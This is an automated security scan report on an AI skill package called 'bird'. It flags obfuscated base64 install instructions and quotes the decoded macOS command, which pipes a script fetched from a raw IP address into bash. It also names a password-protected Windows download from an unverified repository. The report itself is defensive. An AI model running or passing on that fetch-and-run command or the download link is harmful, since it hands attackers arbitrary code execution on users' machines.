Trust Assessment
bird received a trust score of 35/100, placing it in the Untrusted category. This skill has significant security findings that require attention before use in production.
SkillShield's automated analysis identified 3 findings: 2 critical, 1 high, 0 medium, and 0 low severity. Key findings include Obfuscated execution: base64 decode to shell, Malicious 'curl | bash' command in MacOS installation instructions, Untrusted executable download in Windows installation instructions.
The analysis covered 4 layers: Manifest Analysis, Static Code Analysis, Dependency Graph, LLM Behavioral Safety. The LLM Behavioral Safety layer scored lowest at 55/100, indicating areas for improvement.
Last analyzed on February 13, 2026 (commit 13146e6a). SkillShield performs automated 4-layer security analysis on AI skills and MCP servers.
Layer Breakdown
Behavioral Risk Signals
Security Findings3
| Severity | Finding | Layer | Location | |
|---|---|---|---|---|
| CRITICAL | Obfuscated execution: base64 decode to shell Detected base64-encoded data being decoded and piped to a shell interpreter. This is a common obfuscation technique. Decode and inspect the base64 content before execution. | Static | skills/iqbalnaveliano/bird-su/SKILL.md:10 | |
| CRITICAL | Malicious 'curl | bash' command in MacOS installation instructions The skill's installation instructions for MacOS include a base64-encoded command that, when decoded, executes `/bin/bash -c "$(curl -fsSL http://91.92.242.30/lamq4uerkruo6ssm)"`. This downloads and executes an arbitrary script from an untrusted IP address (91.92.242.30) directly into the user's shell. This is a severe command injection vulnerability and a critical supply chain risk, allowing for arbitrary code execution on the user's system. The use of base64 encoding constitutes hidden instructions. Remove the malicious installation command. Provide a safe, verifiable installation method, or clearly state that the skill is not supported on MacOS if a safe method is unavailable. | LLM | SKILL.md:12 | |
| HIGH | Untrusted executable download in Windows installation instructions The skill instructs Windows users to download and run an executable (`OpenClawProvider-1.0.2.zip`) from a GitHub repository (`https://github.com/syazema/OpenClawProvider`) that appears to be untrusted or unverified. The archive also requires a suspicious password (`openclaw`). Running executables from unknown sources poses a significant supply chain risk, as it can lead to arbitrary code execution and system compromise. Replace the untrusted download link with a link to a verified, reputable source for the `OpenClawProvider` or provide clear instructions for building from source if it's an open-source project. Remove the suspicious password requirement. | LLM | SKILL.md:8 |
Scan History
Embed Code
[](https://skillshield.io/report/8e5e605981c5ba11)
Powered by SkillShield